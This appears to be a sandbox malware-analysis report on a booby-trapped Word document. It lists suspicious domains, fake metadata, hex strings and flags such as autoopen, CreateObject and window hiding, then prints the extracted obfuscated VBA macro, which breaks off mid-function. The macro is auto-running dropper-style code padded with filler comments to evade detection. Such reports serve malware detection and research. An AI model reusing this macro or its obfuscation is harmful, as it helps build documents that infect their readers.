cheematransxpressinc.com [VT]
aceontheroof.com [VT]
www.dgxbydamonique.com [VT]
aaplindia.com [VT]

Summary

SummaryInformation Metadata

Creating Application Microsoft Office Word
Author Delmer Reichert
Last Saved By Arjun Flatley
Creation Time None
Last Saved Time None
Total Edit Time 0
Document Title Re-contextualized
Document Subject TCP
Amount of Pages 1
Amount of Words 29
Amount of Characters 168

DocumentSummaryInformation Metadata

Company Mayert, Lesch and Becker
Document Version None
Digital Signature None
Language None
Notes None

File Analysis (Signatures)

HexStrings
b4020402c1 \xb4\x02\x04\x02\xc1
507406002c Pt\x06\x00,
c06088160c15 \xc0`\x88\x16\x0c\x15
cbc1c8607062 \xcb\xc1\xc8`pb
061c763809 \x06\x1cv8
b69b0107 \xb6\x9b\x01\x07
630b000970 c\x0b\x00 p
b2608c2007b6 \xb2`\x8c \x07\xb6
8918b544 \x89\x18\xb5D
b9997404c7 \xb9\x99t\x04\xc7
208689902740 \x86\x89\x90'@
bc7850849c97 \xbcxP\x84\x9c\x97
c017004200 \xc0\x17\x00B\x00
3901610700 9\x01a\x07\x00
c3c0508288 \xc3\xc0P\x82\x88
b40580603123 \xb4\x05\x80`1#
71097408 q t\x08
46b0489598 F\xb0H\x95\x98
92024508c0 \x92\x02E\x08\xc0
b4308c61738b \xb40\x8cas\x8b
b0b3030103cc \xb0\xb3\x03\x01\x03\xcc
b077225032 \xb0w"P2
c07000c088 \xc0p\x00\xc0\x88
64557691b0 dUv\x91\xb0
bc1bbc00700b \xbc\x1b\xbc\x00p\x0b
b054b7bb75 \xb0T\xb7\xbbu
80867b29 \x80\x86{)
b4049083 \xb4\x04\x90\x83
8c8cb816 \x8c\x8c\xb8\x16
0032173206 \x002\x172\x06
09b1805cc8 \xb1\x80\\xc8
c98026840305 \xc9\x80&\x84\x03\x05
cb3b71352441 \xcb;q5$A
b400073b \xb4\x00\x07;
bc9517b0751b \xbc\x95\x17\xb0u\x1b
0c950c83 \x0c\x95\x0c\x83
c56960290407 \xc5i`)\x04\x07
701005016044 p\x10\x05\x01`D
bb550930 \xbbU 0
c0c6279305 \xc0\xc6'\x93\x05
ccc900170c08 \xcc\xc9\x00\x17\x0c\x08
c0560630c6 \xc0V\x060\xc6
c0668000980b \xc0f\x80\x00\x98\x0b
b504c029c2 \xb5\x04\xc0)\xc2
15850b83 \x15\x85\x0b\x83
29505b38 )P[8
3215269524 2\x15&\x95$
cc05161550 \xcc\x05\x16\x15P
c5979730000b \xc5\x97\x970\x00\x0b
c0040557 \xc0\x04\x05W
5b00597284 [\x00Yr\x84
96698654 \x96i\x86T
b05580509c \xb0U\x80P\x9c
c93b1307 \xc9;\x13\x07
b07b51660010 \xb0{Qf\x00\x10
b051000b2442 \xb0Q\x00\x0b$B
340b9200 4\x0b\x92\x00
b9b3c04670 \xb9\xb3\xc0Fp
9177020130 \x91w\x02\x010
b113008972 \xb1\x13\x00\x89r
c70722093692 \xc7\x07" 6\x92
3259902360 2Y\x90#`
bc0651643077 \xbc\x06Qd0w
61b317109c a\xb3\x17\x10\x9c
b90158606801 \xb9\x01X`h\x01
bc09930172 \xbc \x93\x01r
c30629206580 \xc3\x06) e\x80
b067573294b1 \xb0gW2\x94\xb1
b3221cb649 \xb3"\x1c\xb6I
00834b82 \x00\x83K\x82
bbcc00b48753 \xbb\xcc\x00\xb4\x87S
cb704b1330 \xcbpK\x130
75b08104 u\xb0\x81\x04
0156444570 \x01VDEp
20975641 \x97VA
b090050000 \xb0\x90\x05\x00\x00
393657c02388 96W\xc0#\x88
b270730603 \xb2ps\x06\x03
bbc0470304 \xbb\xc0G\x03\x04
90790463b0 \x90y\x04c\xb0
12370b51 \x127\x0bQ
c80901129173 \xc8 \x01\x12\x91s
4501070487 E\x01\x07\x04\x87
cb50b092b53c \xcbP\xb0\x92\xb5<
c298790540 \xc2\x98y\x05@
c6400580 \xc6@\x05\x80
0657cbc7 \x06W\xcb\xc7
c0098500 \xc0 \x85\x00
07176034 \x07\x17`4
0c993b7c65 \x0c\x99;|e
Suspicious
ChrW May attempt to obfuscate specific strings (use option --deobf to deobfuscate)
virtual May detect virtualization
CreateObject May create an OLE object
system May run an executable file or a system command on a Mac (if combined with libc.dylib)
ShowWindow May hide the application
ChrW May attempt to obfuscate specific strings (use option --deobf to deobfuscate)
Open May open a file
virtual May detect virtualization
CreateObject May create an OLE object
system May run an executable file or a system command on a Mac (if combined with libc.dylib)
AutoExec
autoopen Runs when the Word document is opened

Extracted Macros

VBA Filename x2790534112.bas Extracted Macro
Function x90933c0328()
On Error Resume Next
   'Tenge Incredible Meadows Crest Avon Integration Team-oriented Games, Health & Grocery Sleek incremental
cb50x091c490 = True
'quantify cultivate Savings Account USB digital cross-platform Chief models Practical Plastic Chips programming
cc09047856348 = "Baby & Shoes Ranch quantifying quantifying View policy Awesome Frozen Chips Money Market Account Small Cotton Hat Soft"
'application needs-based demand-driven invoice Summit static Cape Verde Escudo
      x014xx29x5x = c90x42320906 - x3870730713x
      'Corporate strategic Metrics Rapid Home Loan Account Green
      Select Case xbx07405243
      'deliver capacitor Rustic payment Brand orchestrate leverage high-level Intelligent Plastic Keyboard
         Case c523005144010
         'grid-enabled synergies Falkland Islands Pound Delaware Small Wooden Chicken User-friendly Direct Rubber
            x9847b20800 = bx12b073304x1
            'bandwidth red stable override input Canadian Dollar Iraq firmware Games, Clothing & Computers
            cc99294690b8 = Atn(b303973c7b059)
            'generating Macao XSS circuit Garden Incredible Granite Shoes azure Digitized
         Case x33b9b6213015
         'Indiana Lebanon index Clothing & Tools Chief Strategist portals
            xc190568651 = b90x79579797
            'Global Malagasy Ariary e-enable Garden Mauritania mobile Research schemas hard drive Shoal transparent Sleek Plastic Bike clicks-and-mortar
            cx93072b02x = c90757085608
            'French Polynesia Unbranded Wooden Towels deposit transmitter deposit Decentralized
         Case c275b93080c
         'system-worthy sky blue compress Brazil Inverse Web Ohio Checking Account
            b606x72900010 = ChrW(x609b6601002)
            'Clothing, Home & Sports maroon SAS brand Ergonomic Frozen Salad Open-source salmon orange redundant Sleek optimize
            xb5b97c7x0x53 = b1c707bx5230
            'matrix Alabama Planner transmitter Designer Tactics Sleek parallelism schemas vertical instruction set bandwidth embrace
      End Select
      'Ridges white Auto Loan Account infrastructures invoice executive Borders transform International Trace
      cb220006c262 = Atn(c871848709b3)
      'Buckinghamshire Executive Games integrated Expanded Port hacking Shoes & Automotive
      x0394030016 = Hex(xb0x708c08cc)
'Unbranded Frozen Bacon Locks Incredible Soft Chicken plum Awesome Granite Tuna monitor Intelligent world-class Incredible e-commerce calculating Investment Account web-enabled
   'Handmade Cotton Chips Thailand North Carolina Representative reintermediate Plaza
b6x43c7x29b0 = False
'Triple-buffered Intelligent Cotton Gloves Nebraska Meadows multi-byte schemas Money Market Account
cc09047856348 = "Rupiah synergistic Glen Awesome Fresh Practical Concrete Shirt Graphical User Interface transmit experiences Light"
'Associate Communications Unbranded Wooden Sausages Buckinghamshire Electronics & Books strategy Tasty Soft Soap Awesome Steel circuit maroon quantifying bandwidth port
      b7c00x66x420 = x01bcb4563030 - c07904cc09bc0
      'B2C program Wooden initiatives synergize architectures black
      Select Case x430025000x0
      'Unbranded Investment Account Frozen best-of-breed Internal website monitor Refined virtual
         Case x7b70c491x200
         'Chief deposit Incredible quantifying azure lime
            x05x0160x044 = c94c20b06b213
            'payment Representative throughput Toys, Jewelery & Automotive Markets Operations Cotton deposit Belgium Handcrafted Polarised Licensed
            bb5b69070b75 = Atn(b4940320966)
            'modular Buckinghamshire Extensions mint green Ways redundant Refined Cotton Bacon Small Metal Tuna Licensed Metal Bike Tennessee payment Club copy
         Case b3990384003
         'purple array Small Granite Fish Reverse-engineered Marketing Field Assurance port Croatia RSS
            cc4x8450087 = cb9307185213
            'Investment Account Functionality Pre-emptive Maldives Mews Object-based Adaptive Small panel Vietnam technologies
            c8064003b58 = cc68c055696
            'EXE Money Market Account JBOD Product Neck deliverables El Salvador schemas optical
         Case x350190252ccc
         'Progressive Practical Frozen Computer Representative Rapids Maine East Caribbean Dollar Intelligent Rubber Shirt Personal Loan Account hard drive Money Market Account International Sleek Cambridgeshire
            b018x62607b4 = ChrW(b02588701200)
            'Personal Loan Account open-source monitor Mandatory Home Loan Account collaborative enhance override
            c350bx066001 = b2c2880308510
            'XML Cedi deposit cyan Metal Unbranded Granite Bike Analyst Shoals
      End Select
      'Generic Steel Chair orange Liaison bypass South Carolina grey Paraguay multi-byte override
      c9b8087cb3180 = Atn(b58030c82c55)
      'orchid system Arkansas withdrawal Regional Tennessee Nepal purple
      b0c308b06c10c = Hex(b0b05cx6b209x)
'fuchsia Graphic Interface installation Compatible harness Buckinghamshire generate niches compress Michigan Customer Courts Home Loan Account
Set x90933c0328 = CreateObject(b491104015b07(b0x770330081 + x7201320x00.b083b090040 + cc54300xx03c))
   'Grass-roots Oklahoma leading edge grey Cambridgeshire explicit Dynamic expedite Intelligent Alabama Associate Liaison
x8x8040x265 = True
'Gorgeous Handmade Concrete Soap aggregate synthesize tangible North Carolina Unbranded Granite Chips magnetic Cotton structure Gorgeous Granite Ball New York
cc09047856348 = "Savings Account synergize Personal Loan Account Jordan Refined Rubber Car Savings Account supply-chains Practical Generic Granite Chips hard drive Industrial, Games & Clothing Liaison Metal"
'Steel Sleek Small Steel Table Health, Sports & Movies bypass Borders green Unbranded
      x0xc3x5002796 = c9832b77520 - c46027x002x77
      'Metal Stream cultivate Shoes ivory Landing Costa Rica holistic Group Intelligent Granite Keyboard needs-based Representative International Licensed Steel Chair
      Select Case b502c6360bx9
      'driver expedite Syrian Pound Ergonomic Plastic payment e-commerce systematic
         Case b0509069840
         'Rubber Pre-emptive Kids, Beauty & Games Cotton Executive Home Loan Account bandwidth infomediaries
            c5808011x27 = b0802028447
            'Buckinghamshire Cedi Incredible Steel Car Multi-layered Iowa open-source Awesome Rubber Hat Well Outdoors & Health Kentucky Tasty Buckinghamshire
            x08062018b224 = Atn(x770x629b9cb)
            '6th generation Representative back up e-tailers Gorgeous Tools & Books Auto Loan Account Incredible
         Case bbxc0046103x
         'Small Steel Pizza violet deposit Integration bus 5th generation Oval tan Graphic Interface
            c480b96009830 = x3107201b8xc
            'Lead Gorgeous Granite Mouse Coordinator Refined Fresh Fish optimizing Central withdrawal
            c607308b2x2b = x65020c4cc3
            'connecting national Concrete Ford Movies, Jewelery & Sports Awesome withdrawal Unbranded Soft Shirt Home & Movies Fantastic Beauty & Games Fresh
         Case x62x705x1896c
         'calculate hack Total Quality De-engineered Specialist
            xc760907cc081 = ChrW(c18156x09cb1)
            'Adaptive microchip Harbor COM TCP bypassing Orchestrator Toys, Baby & Beauty programming
            c2cxc30600b20 = c3280060054b1
            'Senior Springs Hawaii Unbranded Wooden Keyboard indexing Assistant Generic mobile black Alaska transmit deposit
      End Select
      'Tunnel Ergonomic Rubber Tuna Fantastic Plastic Sausages groupware Ergonomic Metal Tuna program Orchestrator
      c5095097xx41 = Atn(xc70b000710c4)
      'Consultant Corporate calculate knowledge base e-enable moderator Fantastic Money Market Account parse Extension matrix Burundi
      c208518417x0 = Hex(b47cc020bb0)
'best-of-breed Security Washington tertiary primary indigo Strategist
   'plug-and-play distributed Baby & Baby moratorium Berkshire PNG responsive framework reciprocal copying Djibouti Franc
c06000c022x6 = True
'Kids & Tools backing up Refined Plastic Bacon payment calculating Corner Buckinghamshire Plastic Checking Account Sleek Rubber Chair transmit
cc09047856348 = "Christmas Island Tasty Concrete Keyboard Parkways open-source open-source Borders Small Wooden Tuna Infrastructure"
'digital attitude Intuitive Valleys orchestrate transmit forecast
      x45678742b800 = cx00c2x310b8 - x3b0113x6c9
      'leading-edge payment infomediaries Small Plastic Bike Internal mobile Lead
      Select Case b5200c472b6
      'rich Intelligent Steel Pants HTTP transmit North Carolina orchid Cambridgeshire Liaison
         Case xx285x4c097b
         'application vortals black users SDD grey Home Loan Account Jewelery & Jewelery bandwidth website Polarised
            x8502305000b6 = x2798c390994c
            'Investor Granite wireless circuit THX Bolivar Fuerte Trail neural compress Squares navigating silver invoice
            c02310022068c = Atn(b5850503x8006)
            'calculating system-worthy copying synthesizing New Jersey Unbranded Frozen Mouse granular Cambridgeshire GB reboot Home, Movies & Beauty users
         Case c00bcx0c60c0
         'Indonesia Fresh Facilitator Generic Steel Bacon utilize virtual orchid compressing heuristic Thailand Configurable Austria Dynamic knowledge user
            x5c3131989306 = b0310090b1763
            'transmit synergies Intelligent Steel Computer Coordinator monitoring Bedfordshire Brazil Orchestrator virtual
            c5840c972021 = c4675c0007b
            'Spring zero administration motivating red plug-and-play Identity bleeding-edge Kids & Jewelery 24 hour Auto Loan Account
         Case xb8007x00bb36
         'success Fresh web-readiness Junctions Gorgeous TCP Small Israel interface Supervisor back up experiences value-added
            x5586930b000 = ChrW(cb255858037cc)
            'Unbranded Granite Mouse wireless Saudi Riyal Junctions navigating Customizable experiences quantifying Greenland utilize Intelligent Refined Steel Soap Health
            b107503b500 = b0x8cx1x00x
            'sky blue e-enable invoice Principal Incredible Cotton Towels Rubber e-business generating
      End Select
      'overriding index Technician Fresh intuitive Square Handcrafted azure invoice compressing bypass Quality Burg Applications
      b5cx364799044 = Atn(c06601bc30xc)
      'Communications Sudanese Pound Small Concrete Car application Oregon transmit Pennsylvania Eritrea Re-contextualized sticky Division distributed
      b3076300474 = Hex(cbx2000x03608)
'1080p Balanced Representative Qatari Rial International Shoal Checking Account Avon cyan scalable Vietnam
x90933c0328.ShowWindow = wdTextureNone
   'Bedfordshire Intelligent Soft Bike Soft withdrawal incubate maroon
x90c90c00112x = True
'wireless quantify Ergonomic Fresh Pizza product Savings Account Diverse Music Cloned compressing Refined Fresh Keyboard Borders Ergonomic Concrete Pants Refined Steel Pants
cc09047856348 = "Brazil protocol markets invoice relationships deposit International Crest"
'Granite enable transmit Division New Hampshire application Cotton Groves
      x2c504407xx20 = c5000200c15 - c2x402b1b60
      'Fresh United Arab Emirates leverage Lilangeni Savings Account Bedfordshire Kiribati Lock Avon Organized Cambridgeshire Road
      Select Case c2b882b7395x6
      'orange Cambridgeshire visionary back up Director HTTP olive parse multi-byte Nauru
         Case b02222b3075
         'open-source Security Response architecture Tasty Fresh Mouse projection
            x00x60680561x = b642600b26c7
            'bypass invoice models grow challenge Neck Sharable emulation program web services syndicate
            xbc8365056616 = Atn(cb205051cb01)
            '24/365 SDD Rest parsing Norway index Dynamic throughput gold Synchronised integrated
         Case b3400843680c9
         'Iraq Sleek Soft Salad Upgradable virtual communities port
            c33186400cb80 = b39c01c300x3
            'Director Metal Money Market Account invoice program Investor Assistant Norwegian Krone firewall
            c3b43406xbbb = c806301757c8
            'Awesome Fresh Shoes Ergonomic Fresh Chips quantify ADP Technician Solutions Facilitator Rufiyaa
         Case b17102x0x26
         'Advanced Rubber deposit Delaware AI Diverse Auto Loan Account Rustic convergence access calculate
            c37x0077c0608 = ChrW(c51909x0602)
            'Common Incredible Fresh Ball Zambian Kwacha transmitting Corporate budgetary management Bedfordshire optical Pennsylvania Fantastic open-source
            c7900x220730 = b2x1c00x6x00
            'bypassing South Dakota Loop North Dakota quantify Brook Greece empower Cambridgeshire Maryland
      End Select
      'help-desk West Virginia deposit Tenge Avon Field
      bbb670062718c = Atn(c00037659b3)
      'navigate Buckinghamshire Tala seize customer loyalty deliverables Kip connect Bedfordshire cohesive parsing synergize New Mexico
      x8c00490501x7 = Hex(b068007c0x0)
'Granite bypass ivory Manager bottom-line quantifying Place Avon Small Licensed Concrete Mouse one-to-one Manager
   'navigate engineer Associate Ergonomic Soft Salad Savings Account Handcrafted Soft Shoes plum Auto Loan Account payment Serbian Dinar FTP
b08c6b85656 = True
'drive plug-and-play Awesome Wooden Chips Orchestrator indexing Licensed Granite Shoes HDD Virginia Books & Shoes Kids, Music & Toys Handcrafted
cc09047856348 = "capacitor payment scale wireless Small Steel Chicken Handcrafted Soft Table copying Licensed Steel Computer Tactics Producer"
'Via View Outdoors & Automotive Granite Avon Handmade Unbranded Cambridgeshire International bypassing
      x0621x802940 = b9b9x098364c - c2c3700c4571
      'didactic input e-tailers Pike Director calculate Refined Plastic Keyboard Handcrafted Soft Bike Hawaii Data global microchip
      Select Case xc1127b05956
      'deposit ROI Central deposit white Garden & Beauty
         Case b00b61b06b33
         'Cape Verde hierarchy Fall Money Market Account open-source Communications Causeway time-frame Cambridgeshire Keys
            x7c053513100 = c40x1194769
            'Accountability Optimization feed Configurable Data deposit Lead Trinidad and Tobago Dollar
            x7c00095079 = Atn(x189c80xcc13)
            'Buckinghamshire connecting Kansas capability granular Investor SSL back up
         Case b0x8x1x17c30
         'Representative Port Self-enabling circuit Analyst implement Route Kwacha syndicate Prairie Steel quantifying
            b00c00x5003b = x50606b7008
            'Spur Practical Soft Soap Re-contextualized Generic Concrete Chips Canyon Rest Tasty Azerbaijan Product New Jersey Money Market Account
            c863c91612b = bcbc2000cb1
            'Horizontal bypass Chief Frozen Practical Rubber Gloves Fantastic multi-tasking Strategist Reunion
         Case b70c05c7c02
         'Plastic Legacy Florida Rhode Island card Organized online transition Usability Guinea Franc
            b1901017c05 = ChrW(cx59726x386x)
            'connecting Liaison Licensed Fresh Mouse open-source distributed Unbranded
            x71307b87b30 = bc85520bc410
            'azure Wells Rwanda harness ivory Balanced New Caledonia Coordinator Lek composite HDD
      End Select
      'impactful Baht function Architect Orchestrator Cambridgeshire holistic
      x6c00200077 = Atn(x5349x05cxb7)
      'Vista web services Global conglomeration Lead context-sensitive maroon
      x50b0707b05x0 = Hex(xx030980060b)
'Kansas user-centric Kids & Baby pricing structure methodologies innovate multi-byte New Mexico target Mobility Glens framework scalable SMS
End Function
Function b491104015b07(x08000685306)
On Error Resume Next
   'Avon salmon Branding middleware SMTP SAS payment Washington Awesome Cotton Gloves Radial calculating Station driver Port
b300038x4b0 = False
'human-resource quantify empowering neural back-end user-facing monitor Savings Account Unbranded Soft Pants
cc09047856348 = "ivory Metical Stand-alone Multi-tiered Wooden Response Gorgeous Cotton Shirt Ergonomic Cotton Mouse Cotton copy Automotive & Music Incredible transmitter"
'context-sensitive Mission digital magnetic Incredible payment silver RSS one-to-one Frozen Borders Switchable Administrator
      c084042440xc = b0c94b030908 - bb90995bx0456
      'Oregon RAM networks enable Jewelery, Outdoors & Kids calculating
      Select Case b00b9b11457
      'Executive synthesize Ergonomic Generic Granite Cheese CSS copy matrix Mountain systems Home Loan Account Factors
         Case c05bx3021b5b
         'compressing Tasty Steel Chicken Borders contextually-based Isle of Man Crescent FTP Bhutan portals New Caledonia Auto Loan Account stable
            c3206cb70c77 = c36cb0cc324
            'Future-proofed teal Cotton Refined Fresh Bacon Toys virtual Up-sized Seychelles interface Port
            cb02x7860c6x5 = Atn(x36468506201)
            'Rustic Canada Knolls olive Re-contextualized Multi-channelled Cotton Ergonomic Steel Ball Money Market Account
         Case c0635c5b06xc
         'Incredible Granite Hat Circle orchestration Small Paradigm synthesize Steel Money Market Account Lights deposit
            xxb850b0008x5 = cx340010902
            'copy virtual Licensed Fresh Table protocol Dynamic Spring invoice Nebraska Granite
            b043069613045 = b8482006899
            'Hawaii reboot Comoro Franc time-frame Buckinghamshire deposit Trail Cambodia white Central wireless superstructure architectures
         Case x49c0c5072c05
         'Plastic systems protocol strategic Home Loan Account Michigan
            b7x50x5b678b9 = ChrW(bc69508742640)
            'payment Uganda Interactions scale Credit Card Account Open-source copy Credit Card Account Silver Human Cameroon throughput
            c0bx0b92007 = b3b0308x402
            'Tennessee Generic navigating web-enabled Spring Dale
      End Select
      'Agent Kenyan Shilling Niue Group Fresh ADP Rest Buckinghamshire payment Central Park
      c7c57692000 = Atn(b0069056xb19)
      'embrace 1080p Corporate Glen Lead Lebanese Pound invoice Sleek Plastic Pizza cyan
      b1300b0bbb6 = Hex(b095bb019b0)
'quantifying Technician Rustic Frozen Hat upward-trending bypassing interface Montenegro
   'Spring input Assistant Configuration matrix Toys, Electronics & Garden
c7100669297 = True
'Gorgeous Rubber Fish panel Awesome Soft Bike Lead Officer Shoals Face to face Turnpike Course Union
cc09047856348 = "Developer Frozen yellow value-added Generic neural Handcrafted Soft Table"
'Estate Movies & Sports Technician Concrete redundant Specialist parse
      cx7b60286813 = b070c7bx500x9 - b50400c5b730
      'quantifying driver Tools Personal Loan Account Agent portals quantify Missouri Granite partnerships Internal Handmade Granite Bacon
      Select Case c0596c08052
      'Director parsing optical parsing United Arab Emirates index Secured mesh Unbranded Rubber Gloves
         Case b0b6b3bb1303b
         'expedite Universal transmitting cutting-edge Forward Kansas Massachusetts
            b40989606219 = c5c7x780x253c
            'solutions Steel Awesome Saudi Arabia Generic Soft Chicken Phased US Dollar open-source
            b4506c3868bx = Atn(x08336009x89)
            'Rustic Cotton Pants Frozen Frozen Cambridgeshire Handmade brand Internal partnerships Canyon backing up multi-byte Passage Rustic Rubber Cheese Awesome Frozen Gloves
         Case b1370c009017
         'Fantastic Frozen Car Intelligent Frozen Computer Sleek Metal Gloves discrete redundant plum Legacy infrastructures
            b006840400010 = b208xb326107
            'generate generate parse innovate connecting back up installation copying Future Metal Functionality
            cc91x19bbxb = b4974112640
            'AGP user-centric aggregate Nebraska Savings Account Lead Home Investment Account Producer
         Case x9320061x0b00
         'open-source salmon Vision-oriented intranet quantifying payment microchip Tasty Cote d'Ivoire Customer Rustic Plastic Salad
            b10750000844b = ChrW(c0020x90c2x)
            'Canada info-mediaries protocol systematic Tasty Rubber Soap Saudi Riyal Refined Handcrafted Metal Pizza Orchestrator
            b7779303730 = c685443003b
            'Refined Frozen Keyboard index Haiti Delaware morph Ergonomic Metal Bacon neural schemas Rue Montana
      End Select
      'solution-oriented Small Liechtenstein Berkshire Interactions Architect Nevada solution impactful Lodge Managed
      c74725x831b0 = Atn(c0c4b6921c907)
      'Checking Account white programming Drive violet global
      b26cc5300b39 = Hex(x78984000000)
'Chief interactive backing up East Caribbean Dollar strategic Intelligent data-warehouse Borders Port
c60xbxxb86403 = x08000685306
   'artificial intelligence static green compressing payment Consultant Pataca yellow withdrawal Taiwan Markets copy Sleek
x6x401450x00 = False
'Usability Intranet Unions firewall Wooden Small Soft Ball Home Loan Account enable Customer Oval Kids Steel
cc09047856348 = "River National Producer Brunei Dollar PCI Ergonomic Steel Car Fantastic Steel Chips Home Loan Account contextually-based implement"
'Investment Account Armenia functionalities parse success Fresh Streamlined Gorgeous Steel Keyboard microchip adapter connecting clear-thinking Manager Analyst
      c0b26006b90c = bx590649426 - c981058x828
      'navigate synergy Norwegian Krone Profound Yemeni Rial Cliffs digital National Intelligent Soft Gloves California Bedfordshire New Zealand Dollar Alaska
      Select Case b652505bb06b0
      'compress Infrastructure Music, Jewelery & Beauty benchmark Centers brand calculate
         Case x60079x056b
         'Down-sized payment Principal index invoice invoice Concrete Ergonomic cyan Bypass Books
            x000bx002b0 = x90bb0080c50
            'Rustic Fresh Pizza Intelligent client-server Credit Card Account Minnesota e-enable
            b9x04c502x9 = Atn(b1040x1720341)
            'Trace bottom-line Plastic ADP Markets Small Taiwan Albania pixel Intelligent Rubber Table Rustic Djibouti Franc deliverables Rustic Rubber Cheese
         Case b820x05b2347
         'US Dollar driver cyan USB Rubber violet back up Jamaican Dollar payment Representative
            b03b05509600 = c83c5x28000
            'client-driven ability bypass View Security schemas compressing virtual Granite optical system Tasty
            x8b65110b02 = c709c162370
            'Profound reintermediate Albania Practical Generic Granite Hat USB Compatible Village back up Intuitive Investment Account New Israeli Sheqel client-driven
         Case cb0x7cb4318
         'hacking Switchable Incredible hack transmitter Village Baby, Electronics & Jewelery online
            b1398x01x98x = ChrW(b90bb222cxb4b)
            'ROI Comoro Franc synthesize Sports, Books & Outdoors Marketing reboot Burgs systems relationships Executive expedite South Africa Gorgeous Soft Shirt
            b329072070030 = xx05887c70b3
            'invoice IB Direct Won green Personal Loan Account Refined compressing blue maximize back-end matrix
      End Select
      'Curve integrated static Analyst Generic Balanced tertiary Garden & Industrial Berkshire Senior
      b209343430c = Atn(xcb03300b586c)
      'Jewelery & Computers Personal Loan Account GB Mountains United States of America deliverables
      c0921808x87 = Hex(c8b2605x500)
'reboot Incredible Steel Computer indexing Auto Loan Account Movies Product SMTP Tools Fresh Supervisor green
   'Personal Loan Account Handcrafted Granite Gloves Bedfordshire Yen back-end projection Persistent Lead Fundamental JBOD USB XML
c60c5x140c61 = True
'Lead Personal Loan Account Marketing Steel Cambridgeshire matrix Public-key neural cyan Sleek Metal Bike Awesome Frozen Sausages optical Handcrafted Steel Gloves
cc09047856348 = "auxiliary content Auto Loan Account Ports Home conglomeration Data Montana Licensed Garden & Jewelery Silver"
'Small Director Synergized transmitting Ergonomic Concrete Ball reinvent Landing convergence Valleys copying
      x908070b90261 = c0372493560 - x9070208c88
      'Officer executive Unbranded Steel Chicken Bedfordshire Rufiyaa Saint Helena Harbor index Lodge Refined Rubber Ball Fresh front-end
      Select Case c0b000b3x1c89
      'Stand-alone integrated Licensed Steel Bacon Refined Soft Sausages cross-platform Personal Loan Account Stream payment Executive driver Islands Rustic Rubber Chair Devolved
         Case b3cxb00x0970
         'Mississippi Ports Factors Russian Federation alarm Total Mission invoice magenta withdrawal Profound
            c290670177x4 = b8020620677
            'Savings Account Incredible neural-net Personal Loan Account 6th generation payment action-items Metrics Orchestrator plug-and-play
            ccb30001049 = Atn(bc07x90573020)
            'Director IB Villages array Human plug-and-play Accountability compressing New York Auto Loan Account Licensed reinvent Virtual Incredible
         Case x0c376cx51b
         'SSL Argentine Peso Specialist Lari content-based PCI
            x511b1bbx060x = c2bx1011246
            'Response Coordinator monitor Tugrik Netherlands Antilles e-services Sports & Games Technician Investment Account ADP Buckinghamshire Incredible Frozen Tuna salmon Jewelery
            x2401x3bb7c = xx0757001cbb
            'system-worthy transmitting Architect Fiji South Dakota Self-enabling utilize Berkshire Kansas Point supply-chains South Carolina composite Spur
         Case c2006x00967
         'Automotive & Kids Awesome pixel Industrial Cloned orange Savings Account Forward heuristic
            xb090289138 = ChrW(x30b200050b08)
            'olive grid-enabled Iraqi Dinar copy Awesome Soft Chair program Synergized payment open-source
            x23x067055108 = c20684x7199b0
            'RSS Fully-configurable deliver Distributed Operations strategize Incredible Fresh Chicken deposit channels Specialist Mobility mint green
      End Select
      'plug-and-play Handmade Estate Strategist Route web services Rustic Wooden Towels convergence pink AI relationships
      c17070x8b5955 = Atn(x270000bx4b)
      'Object-based middleware leverage Libyan Arab Jamahiriya Concrete orange Concrete Implementation Drive bandwidth neutral Gorgeous Practical Fresh Table
      xx506070c09 = Hex(b0b00701755x5)
'Swaziland plug-and-play Malta Bhutan PCI Zimbabwe Dollar Universal programming Configuration Falls Alabama
c6x004870b2x6 = "50"
   'International withdrawal intangible paradigms Trail Australian Dollar Engineer AGP quantify US Dollar revolutionary
x78x5bx092c0 = False
'Buckinghamshire National overriding complexity Quality Global Web
cc09047856348 = "content-based zero administration invoice transmit circuit Intranet Movies, Outdoors & Beauty feed overriding Regional International Robust"
'cultivate Health core Designer paradigm Sleek Plastic Tuna Road ROI Awesome Wooden Car Rustic Fresh Computer harness navigating hierarchy Outdoors & Home
      b0100530637 = b35073290737 - xbb8b3450094
      'Home & Jewelery hard drive Station Florida New Jersey Buckinghamshire Berkshire Intelligent Concrete Pizza parsing Savings Account quantifying
      Select Case xx240645257
      'invoice models Cambridgeshire panel UIC-Franc Coordinator EXE Berkshire Credit Card Account South Dakota hacking IB
         Case b530230b0596c
         'generate Steel Causeway HTTP Brand International generate Pakistan Rupee copying
            b7x1b070208 = c08b660x505
            'Designer Rapids parallelism dot-com productize Checking Account online Garden & Kids synthesize Kina Unbranded
            x1770032084 = Atn(c07x07102x08)
            'users invoice Accounts Representative Optimization pink models Indonesia UIC-Franc Gold
         Case xbb77b00329x
         'functionalities Graphical User Interface invoice Aruba GB Money Market Account
            c0c19x9b45x00 = x0001b10x029b
            'Borders incremental Awesome New Jersey Developer Gorgeous open system Generic Wooden Pants Consultant Directives Borders Denmark Rustic Concrete Sausages Licensed Fresh Bacon
            x006c408000c = b0240c50b776
            'programming Branch strategic evolve International backing up Frozen East Caribbean Dollar Operations cyan Grove Books, Sports & Tools
         Case b5386xccx31
         'action-items Handcrafted Plastic Shirt Cambridgeshire clear-thinking Small cross-platform compressing synthesize Avon turquoise utilisation
            x00306c5b03 = ChrW(c50c07292672)
            'Mongolia Coordinator Utah Zimbabwe Dollar Buckinghamshire Producer
            b49013030b28 = c2504bc920471
            'backing up New Jersey deposit Shoals XML supply-chains Brooks Cloned Russian Federation
      End Select
      'Versatile Ergonomic Wooden Chicken paradigms functionalities Avon Alaska partnerships Shore Frozen Cliffs Music & Books tan haptic
      b3b309x3xc076 = Atn(c174x0x80740b)
      'Home Loan Account Buckinghamshire Alabama Syrian Pound IB Generic Soft Chair real-time Identity Sleek Rubber Shoes Communications bi-directional Applications Directives Turkey
      bb1549c3x180 = Hex(b58c7x1007049)
'scalable program Auto Loan Account Berkshire bandwidth SQL bus website
   'forecast Refined Cotton Gloves Research invoice Berkshire Intelligent Soft Chicken database holistic foreground Rustic Fresh Tuna Unbranded Port ADP
c004604bcx0 = False
'parsing plum Metal Cambridgeshire SMTP Reduced revolutionary sticky
cc09047856348 = "CSS Analyst Georgia circuit cyan Accounts"
'Ameliorated Algeria Toys Steel salmon Auto Loan Account transform Estates applications virtual TCP systems
      x389c2427685 = b06000931bc - x60c030000760
      'transition Djibouti Graphic Interface optimal Seychelles Rupee hacking lime hybrid
      Select Case b210c90c81090
      'Devolved Rial Omani repurpose Concrete Metal auxiliary Practical Cotton Chair Fantastic Savings Account
         Case b60629930c6
         'Refined Soft Bacon visionary Handcrafted holistic Technician Glen Handcrafted wireless
            c03bc00001xx = x0070304b634
